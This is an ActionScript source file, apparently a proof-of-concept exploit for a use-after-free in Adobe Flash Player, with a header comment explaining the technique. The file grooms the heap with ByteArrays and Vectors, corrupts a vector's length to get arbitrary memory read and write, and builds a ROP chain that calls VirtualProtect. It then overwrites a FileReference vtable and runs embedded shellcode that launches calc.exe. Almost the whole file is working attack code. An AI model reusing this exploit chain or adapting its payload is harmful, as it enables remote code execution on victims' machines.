﻿/*
    How does that work?
    First of all the html loads VectorHelper which initiliazes a few callbacks along with some arrays. The html loads then the AS2 and triggers the vuln.
    At that moment the AS2 calls mapByteArrays to fill the freed space with controlled data. The AS2 resumes and writes a pointer to a filter in that ByteArray.
    We call then checkByteArrays to figure which ByteArray was affected, and then alter the nextFilter pointer so that it points to the length of an AS3 vector.
    We add then a second filter in AS2 to that list which overwrites the vector's length with a pointer. At that point, we call calcMe from the AS2 to determine
    which vector was affected. And that's it, once we have a vector with a magic length, game over :).
    
    
    Compile with mxmlc -target-player 15.0 -swf-version 25 VectorHelper.as.
    Compile the AS2 with Flash CS5.5 and manually change the properties "s" and "t" to "0" and "2" in the generated swf.
*/

package  {
    import flash.utils.ByteArray;
    import flash.utils.Endian;
    import flash.events.Event;
	import flash.display.Sprite;
	import flash.net.FileReference;
    import flash.external.ExternalInterface;

	public class VectorHelper extends Sprite {
        public var vArray:Array = [];
        public var nVectors:uint = 0x400;
        public var vectorLength:uint = (0x50 - 8) / 4;
        public var baArray = [];
        public var nByteArrays:uint = 0x300;
        public var baPayloads = [];
        public var vAddress:uint = 0;
        
		// initialize some objects
		public function VectorHelper() {
            for (var i:uint = 0; i<nByteArrays; i++) {
                baArray[i] = new ByteArray()
                baArray[i].endian = Endian.LITTLE_ENDIAN;
            }
            for (i = 0; i<nByteArrays-0x100; i++) {
                baArray[i].length = 0x3F8
            }
            for (i = 0x40; i<nByteArrays-0x100; i+=2) {
                baArray[i].length = 0x3F8*2
            }
            
            for (i = 0; i<nVectors; i++) {
                vArray[i] = new Vector.<uint>(4)
            }
            for (i = 0; i<nVectors; i++) {
                vArray[i].length = vectorLength
            }
            for (i = 0x40; i<nVectors; i+=0x33) {
                vArray[i].length = 2*vectorLength
            }

            
            ExternalInterface.addCallback("mapByteArrays", mapByteArrays);
            ExternalInterface.addCallback("checkByteArrays", checkByteArrays);
            ExternalInterface.addCallback("calcMe", calcMe);
            ExternalInterface.call("AS3Init");
			
		}
		public function mapByteArrays():uint {
            for (var i:uint = nByteArrays-0x100; i<nByteArrays; i+=2) {
                baArray[i].length = 0x3F8
                
            }
            for (i = 0; i<nByteArrays; i++) {
                baArray[i].position = 0x318
                baArray[i].writeUnsignedInt(0)
                baArray[i].writeUnsignedInt(0x41424344)
                baArray[i].writeUnsignedInt(0x41424300)
                
            }
            return 0
        }
        
        public function checkByteArrays():uint {
            for (var i:uint = 0; i<nByteArrays; i++) {
                baArray[i].position = 0x318
                var p:uint = baArray[i].readUnsignedInt()
                if (p != 0) {
                    baArray[i].position = 0x31C
                    var v:uint = (p & 0x0f00)
                    if (v == 0x0f00) {
                        baArray[i].writeUnsignedInt(p - 2*0x50 - 4)
                        vAddress = p - 0x50 + 8
                    } else {
                        baArray[i].writeUnsignedInt(p + 0x50 - 4)
                        vAddress = p + 2*0x50 + 8
                    }
                    return 0
                }

                
            }
            ExternalInterface.call("AS3Fail");
            return 0
        }
        
        public function calcMe():uint {
            for (var i:uint = 0; i<nVectors; i++) {
                if (vArray[i].length > 2*vectorLength) {
                    vArray[i][vectorLength] = 0x40000001
                    for (var j:uint = 0; j<nVectors; j++) {
                        if (vArray[j].length == 0x40000001) {
                            var v:Vector.<uint> = vArray[j]
                            
                            //map the payload in memory
                            baPayloads = new Array()
                            for (var k=0; k<0x20; k++) {
                                baPayloads[k] = buildCalcPayload();
                            }
                            
                            //v[0x20000000] = vAddress
                            shootMe(v, vAddress)
                            return 0
                        }
                    }
                    
                }
                
            }
            ExternalInterface.call("AS3Fail2");
            return 0
        }
        
        

			
		function shootMe(v:Vector.<uint>,vAddress:uint) {
            var i:uint = 0;

            //the next gadgets should only work with Flash 18.0.0.203
            var magicGadgets:Array = []
            
            var dataPointer:uint = getMemoryAt(v, vAddress, ((vAddress & 0xFFFFF000) + 0x1c));
            /*
            CPU Disasm
            Address   Hex dump          Command                                  Comments
            6ACE378D    8B46 0C         MOV EAX,DWORD PTR DS:[ESI+0C]
            6ACE3790    6A 01           PUSH 1
            6ACE3792    FF70 F8         PUSH DWORD PTR DS:[EAX-8]
            6ACE3795    8B40 FC         MOV EAX,DWORD PTR DS:[EAX-4]
            6ACE3798    E8 3825ECFF     CALL 6ABA5CD5   ; wrapper to VirtualProtect
            */
            magicGadgets[0] = dataPointer - 0xf03444 + 0x6c8935
            //v[0x20000000] = dataPointer
            //v[0x20000000] = magicGadgets[0]
            /*
            CPU Disasm
            Address   Hex dump          Command                                  Comments
            6A7880E8    8B70 28         MOV ESI,DWORD PTR DS:[EAX+28]
            6A7880EB    85F6            TEST ESI,ESI
            6A7880ED    74 22           JE SHORT 6A788111
            6A7880EF    8B06            MOV EAX,DWORD PTR DS:[ESI]
            6A7880F1    8BCE            MOV ECX,ESI
            6A7880F3    FF90 80000000   CALL DWORD PTR DS:[EAX+80]      ; call vp
            6A7880F9    84C0            TEST AL,AL
            6A7880FB    74 14           JE SHORT 6A788111
            6A7880FD    8B06            MOV EAX,DWORD PTR DS:[ESI]
            6A7880FF    53              PUSH EBX
            6A788100    FF75 0C         PUSH DWORD PTR SS:[EBP+0C]
            6A788103    8BCE            MOV ECX,ESI
            6A788105    FF75 EC         PUSH DWORD PTR SS:[EBP-14]
            6A788108    57              PUSH EDI
            6A788109    FF50 78         CALL DWORD PTR DS:[EAX+78]      ; calc me
            */
            magicGadgets[1] = dataPointer - 0xf03444 + 0x15BCBA+ 0x00000000
            
            
            //browse the heap to find the payload
            var payloadAddress:uint = getPayloadLocation(v, vAddress, 0x45454545);

            //do the rop
            writeMemoryAt(v, vAddress, vAddress + 0x1C, magicGadgets[1] - 0x00000000);
            writeMemoryAt(v, vAddress, vAddress + 0x28 + 8, vAddress+8);
            writeMemoryAt(v, vAddress, vAddress + 0x8, vAddress+0x08);
            writeMemoryAt(v, vAddress, vAddress + 0x88, magicGadgets[0]);

            writeMemoryAt(v, vAddress, vAddress + 0x14, vAddress + 0x2c);
            writeMemoryAt(v, vAddress, vAddress + 0x24, 0x1000);
            writeMemoryAt(v, vAddress, vAddress + 0x28, payloadAddress & 0xFFFFF000);
            
            writeMemoryAt(v, vAddress, vAddress + 0x10, vAddress + 0x38);
            writeMemoryAt(v, vAddress, vAddress + 0x38, vAddress + 0x38);
            writeMemoryAt(v, vAddress, vAddress + 0x80, payloadAddress + 0x10);

            
            //use a FileReference to redirect the execution flow
            var fileReferenceArray:Array = new Array();
            var nFileReferences:uint = 0x60;
            for(i = 0;i < nFileReferences; i++) {
                fileReferenceArray[i] = new FileReference();
            }

            var fileReferenceAddress:uint = getFileReferenceLocation(v, vAddress);
            var fileReferenceVtable:uint = getMemoryAt(v, vAddress, fileReferenceAddress + 0x20);
            //v[0x20000000] = fileReferenceAddress
            
            //overwrite a FileReference vtable
            writeMemoryAt(v, vAddress, fileReferenceAddress + 0x20, vAddress + 0x00000008);

            //call VirtualProtect and calc. At least one of these fileref is corrupted
            for(i = 0; i < nFileReferences; i++) {
                fileReferenceArray[i].cancel();
            }

            
            //put back the vtable
            writeMemoryAt(v, vAddress, fileReferenceAddress + 0x20, fileReferenceVtable);
        
            //fix the corrupt vector. For once, Chrome will live after that ;)
            v[0x3FFFFFFE] = 0x12
            
        }
        function getMemoryAt(vector:Vector.<uint>, vectorAddress:uint, address:uint):uint{
            if (address >= vectorAddress)
            {
                return (vector[((address - vectorAddress) / 4)]);
            };
            return (vector[(0x40000000 - ((vectorAddress - address) / 4))]);
        }
        
        function writeMemoryAt(vector:Vector.<uint>, vectorAddress:uint, address:uint, value:uint){
            if (address >= vectorAddress)
            {
                vector[((address - vectorAddress) / 4)] = value;
            } else
            {
                vector[(0x40000000 - ((vectorAddress - address) / 4))] = value;
            };
        }
        
        
        
         
        // these lines browse Flash's heap to find a FileReference object
        function getFileReferenceLocation(vector:Vector.<uint>, address:uint):uint{
            var dataPointer:uint = getMemoryAt(vector, address, ((address & 0xFFFFF000) + 0x1c));

            // Find an allocation of size 0x1F8
            var allocation_size:uint;
            while (true)
            {
                allocation_size = getMemoryAt(vector, address, (dataPointer + 8));
                if (allocation_size == 0x1F8) break;
                if (allocation_size < 0x1F8)
                {
                    dataPointer = (dataPointer + 0x24); // next allocation
                } else
                {
                    dataPointer = (dataPointer - 0x24); // prior allocation
                };
            };
            
            var allocation_contents:uint = getMemoryAt(vector, address, (dataPointer + 0xc));
            //vector[0x24000000] = allocation_contents
            while (true)
            {
                if (getMemoryAt(vector, address, (allocation_contents + 0x90)) == 0x50) break;
                if (getMemoryAt(vector, address, (allocation_contents + 0x94)) == 0x50) break;
                allocation_contents = getMemoryAt(vector, address, (allocation_contents + 8));
            };
            return (allocation_contents);
        }

        // these lines browse Flash's heap to find the payload in memory
        function getPayloadLocation(vector:Vector.<uint>, address:uint, marker:uint):uint{
            var heapListEntry:uint = getMemoryAt(vector, address, ((address & 0xFFFFF000) + 0x1c));
            
            //heapListStart points to a structure containing a list of large mapped areas. It begins with 0x1000 followed by a pointer named heapListStart
            var heapListStart:uint = getMemoryAt(vector, address, heapListEntry);
            var largeHeapStart:uint = getMemoryAt(vector, address, heapListStart+4);

            var largeChunk:uint;
            while (true)
            {
                largeChunk = getMemoryAt(vector, address, (largeHeapStart + 4));
                if (getMemoryAt(vector, address, largeChunk) == marker) {
                    //found!
                    //writeMemoryAt(vector,address, 0x41414140, largeChunk);
                    return largeChunk;
                }
                largeHeapStart = getMemoryAt(vector, address, largeHeapStart);
                
            };
            
            //never get here
            return largeChunk;
        }
      
        function buildCalcPayload():ByteArray {
            var calc:ByteArray = new ByteArray();
            calc.endian = Endian.BIG_ENDIAN;
            calc.writeUnsignedInt(0x45454545);
            calc.writeUnsignedInt(0);
            calc.writeUnsignedInt(0);
            calc.writeUnsignedInt(0);
            calc.writeUnsignedInt(0x558BEC57);
            calc.writeUnsignedInt(0x5653E8B6);
            calc.writeUnsignedInt(0x0000005B);
            calc.writeUnsignedInt(0x5E5FC983);
            calc.writeUnsignedInt(0xC414C355);
            calc.writeUnsignedInt(0x8BEC83EC);
            calc.writeUnsignedInt(0x10575664);
            calc.writeUnsignedInt(0x8B153000);
            calc.writeUnsignedInt(0x00008B52);
            calc.writeUnsignedInt(0x0C8B5214);
            calc.writeUnsignedInt(0x8955F8C7);
            calc.writeUnsignedInt(0x45F40000);
            calc.writeUnsignedInt(0x00000FB7);
            calc.writeUnsignedInt(0x4A268B72);
            calc.writeUnsignedInt(0x2833C0AC);
            calc.writeUnsignedInt(0x3C617C02);
            calc.writeUnsignedInt(0x2C20C14D);
            calc.writeUnsignedInt(0xF40D0145);
            calc.writeUnsignedInt(0xF4E2EE8B);
            calc.writeUnsignedInt(0x55F88B52);
            calc.writeUnsignedInt(0x108955FC);
            calc.writeUnsignedInt(0x8B423C03);
            calc.writeUnsignedInt(0x45FC8B40);
            calc.writeUnsignedInt(0x7885C074);
            calc.writeUnsignedInt(0x4D0345FC);
            calc.writeUnsignedInt(0x8945F08B);
            calc.writeUnsignedInt(0x48188B50);
            calc.writeUnsignedInt(0x200355FC);
            calc.writeUnsignedInt(0xE33C498B);
            calc.writeUnsignedInt(0x348A0375);
            calc.writeUnsignedInt(0xFC33FF33);
            calc.writeUnsignedInt(0xC0ACC1CF);
            calc.writeUnsignedInt(0x0D03F83C);
            calc.writeUnsignedInt(0x0075F403);
            calc.writeUnsignedInt(0x7DF43B7D);
            calc.writeUnsignedInt(0x0875E18B);
            calc.writeUnsignedInt(0x45F08B50);
            calc.writeUnsignedInt(0x240355FC);
            calc.writeUnsignedInt(0x668B0C4A);
            calc.writeUnsignedInt(0x8B501C03);
            calc.writeUnsignedInt(0x55FC8B04);
            calc.writeUnsignedInt(0x8A0345FC);
            calc.writeUnsignedInt(0x5E5FC9C2);
            calc.writeUnsignedInt(0x04008B55);
            calc.writeUnsignedInt(0xF88B12E9);
            calc.writeUnsignedInt(0x70FFFFFF);
            calc.writeUnsignedInt(0x63616C63);
            calc.writeUnsignedInt(0x2E657865);
            calc.writeUnsignedInt(0x00558BEC);
            calc.writeUnsignedInt(0x83EC088B);
            calc.writeUnsignedInt(0x450483E8);
            calc.writeUnsignedInt(0x0B8945FC);
            calc.writeUnsignedInt(0x33DB6831);
            calc.writeUnsignedInt(0x8B6F87E8);
            calc.writeUnsignedInt(0x37FFFFFF);
            calc.writeUnsignedInt(0x8945F8B8);
            calc.writeUnsignedInt(0xB8000000);
            calc.writeUnsignedInt(0x0345FC6A);
            calc.writeUnsignedInt(0x0050FF55);
            calc.writeUnsignedInt(0xF8C9C300);

            calc.length = 0x100000
            return calc
        }
		
	}
	
}
